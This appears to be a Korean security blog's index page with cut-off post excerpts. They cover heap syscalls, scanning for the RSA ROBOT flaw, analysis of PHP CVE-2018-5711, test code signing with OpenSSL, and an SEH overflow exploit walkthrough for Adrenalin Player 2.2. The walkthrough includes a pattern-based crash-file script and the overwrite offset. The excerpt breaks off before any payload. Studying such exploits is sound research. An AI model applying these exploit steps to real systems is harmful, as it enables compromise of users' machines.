Exploit without Coffee

나를 즐겁게 하는 일이 무엇인 가를 살펴보는 것은 내가 어떤 사람인지 깨달을 수 있는 좋은 방법이다. 카페에서 하는 노트북, 세바시 강연, 파이썬 프로그래밍, 수수께끼 같은 신규 취약점은 나를 즐겁게 한다. 목표를 향해 제대로 가고 있는 지 알 수 없지만, 아직 컴퓨터가 나를 즐겁게 한다는 것에 안도감을 느낀다. 잘하고 싶은 마음도 간절하지만, 지금처럼 앞으로도 계속 내가 컴퓨터를 좋아하는 사람이었으면 한다.

Heap-Syscall 힙 메모리 할당과 시스템 호출 malloc 은 OS에서 메모리를 얻기 위해 brk 또는 mmap syscall을 사용하여 메모리를 확보한다. brk brk : brk 는 프로그램 중단 위치를 증가시켜 커널에서 메모리를 얻는다. 처음 시작( start_brk ) 및 힙 세그먼트 끝( brk )은 동일한 위치를 가리킨다. ASLR이 꺼지면 start_brk 및 brk 는 data/bss 세그먼트 ( end_data )`끝을 가리킨다. ASLR이 켜지면 start_brk 및 brk 는 data/bss 세그먼트 ( end_data )끝에 임의의 brk 오프셋을 더한 것과 같다. 위의 프로세스 가상 메모리 레이아웃 그림은 start_brk 가 힙 세그먼트의 시작이고 brk (프로그램 중단)이 힙 세그먼트의 끝임을 보여준다. 예시 /* sbrk and brk example */ # include <stdio.h> # include <unistd.h> # include <sys/types.h> int main ( ) { void * curr_brk , * tmp_brk = NULL ; printf ( "Welcome to sbrk example:%d\n" , getpid ( ) ) ; /* sbrk(0) gives current program break location */ tmp_brk = curr_brk = sbrk ( 0 ) ; printf ( "Program Break Location1:%p\n" , curr_brk ) ; getchar ( ) ; /* brk(addr) increments/decrements program break location */ brk ( curr_brk + 4096 ) ; cu

robot-attack RSA 취약점 - Robot Attack 진단 Robot-Detect Github: robot-detect Ubuntu Robot-Detect 설치 sudo apt-get update sudo apt-get upgrade sudo apt-get python3-gmpy2 pip3 install --upgrade pip pip3 install robot-detect 진단 도구 실행 robot-detect [ host ] Windows 파이썬3 설치(환경 변수 등록): python Download page visual c++ 14.0 build tool 설치 gmpy2 설치: gmpy2-2.1.0a1-cp36-cp36m-win32.whl ※ 운영체제 환경에 적합한 버전 내려받은 후 설치 python -m pip install gmpy2-2.1.0a1-cp36-cp36m-win32.whl What’s the difference between “pip install” and “python -m pip install”? 두 명령 모두 pip / init.py에서 같은 main 함수를 호출하여 동일하게 동작한다. robot-detect 설치: pip install robot-detect robot-detect 파일 확장자 .py 로 수정 ([Python 설치 경로]\Scripts\robot-detect) Ex) C:\Users\IEUser\AppData\Local\Programs\Python\Python36-32\Scripts 진단 도구 실행 python robot-detect [ host ] TLS-Attacker Github: TLS-Attacker Ubuntu JAVA 설치 및 JAVA_HOME 환경변수 등록 sudo apt-get install default-jre sudo apt-get install d

CVE-2018-5711 PHP CVE-2018-5711 잘못된 형 변환으로 발생된 PHP 취약점에 대해 알아보자. 영향 버전 PHP 5 < 5.6.33 PHP 7.0 < 7.0.27 PHP 7.1 < 7.1.13 PHP 7.2 < 7.2.1 취약 소스 파일 php-src 소스 저장소 - LWZReadByte_함수 내 취약점 발생 위치 do { sd -> firstcode = sd -> oldcode = GetCode ( fd , & sd -> scd , sd -> code_size , FALSE , ZeroDataBlockP ) ; } while ( sd -> firstcode == sd -> clear_code ) ; return sd -> firstcode ; GetCode 함수는 래퍼 함수로 실제 작업은 GetCode_ 함수에서 수행한다. static int GetCode_ ( gdIOCtx * fd , CODE_STATIC_DATA * scd , int code_size , int flag , int * ZeroDataBlockP ) { int i , j , ret ; unsigned char count ; . . . if ( ( count = GetDataBlock ( fd , & scd -> buf [ 2 ] , ZeroDataBlockP ) ) <= 0 ) scd -> done = TRUE ; . . . } GIF에서 데이터를 읽기 위해서 GetCode_ 함수에서 GetDataBlock 함수를 호출한다. static int GetDataBlock_ ( gdIOCtx * fd , unsigned char * buf , int * Zer

code-sign 전자 서명 테스트 1. 테스트 인증서 생성 pem Generating a private key $ openssl genrsa 2048 > private.pem Generating the self signed certificate $ openssl req -x509 -new -key private.pem -out public.pem If required, creating PFX $ openssl pkcs12 -export -in public.pem -inkey private.pem -out mycert.pfx crt 개인키 생성 $ openssl genrsa -des3 -out server.key 2048 인증요청서 생성 $ openssl req -new -key server.key -out server.csr 인증서 생성 $ openssl x509 -req -days 365 -in server.csr -signkey server.key -out server.crt pfx 파일 생성 openssl pkcs12 -export -out server.pfx -inkey server.key -in server.crt [ -certfile more.crt ] 2. 전자 서명 적용 "C:\Program Files (x86)\Windows Kits\8.1\bin\x86\signtool.exe" sign /a /f mycert.pfx /p testpssword target.exe Done Adding Additional Store Successfully signed: target.exe ./Signtool.exe sign /a /f “{인증서 경로}” /p “{인증서 비밀번호}” /t “{인증서에 따른 Timestamp 서버 주소 예) http://timestamp.verisign.com/scripts/timestamp.dl

Adrenalin_7_SEH_Overflow 아드레날린 플레이어 SEH Overflow 아드레날린 플레이어 2.2 버전에서 발견된 SEH Overflow를 알아보자. 실습은 Windbg 환경에서 진행하며 mona플러그인을 이용하여 먼저 패턴을 생성한다. .load pykd !py mona pc 30000 mona를 이용하여 생성한 패턴을 이용하여 SEH Overflow 필요 버퍼를 알아보자. 파이썬 스크립트를 이용하여 패턴을 내용으로 한 wvx 파일을 생성한다. pattern_file = open ( "pattern.txt" , 'r' ) crash_file = open ( "01_crash.wvx" , 'w' ) crash_file . write ( "{}" . format ( pattern_file . read ( ) ) ) crash_file . close ( ) pattern_file . close ( ) # maximum pattern --> 20280 크래시가 발생하고 !exchain 명령어를 수행하면 SEH 핸들러 주소가 0x35744334로 덮어쓰여진 것을 확인할 수 있다. 0:000> !exchain 0018afa8: 35744334 Invalid exception stack at 74433374 mona를 이용하여 패턴을 확인한다. !py mona po 74433374 - Pattern t3Ct (0x74433374) found in cyclic pattern at position 2140 2140만큼의 쓰레기 값을 생성하고 이어서 SEH Overflow 구문을 삽입한다. 예외 발생 시 예외 처리를 위한 스택 프레임이 생성되는 데 이때 Nseh 는 esp+8 에 위치하고 있다. 따라서 다음의 절차로 공격을 수행한다. SEH 핸들러를 POP / POP / RET 명령어로 덮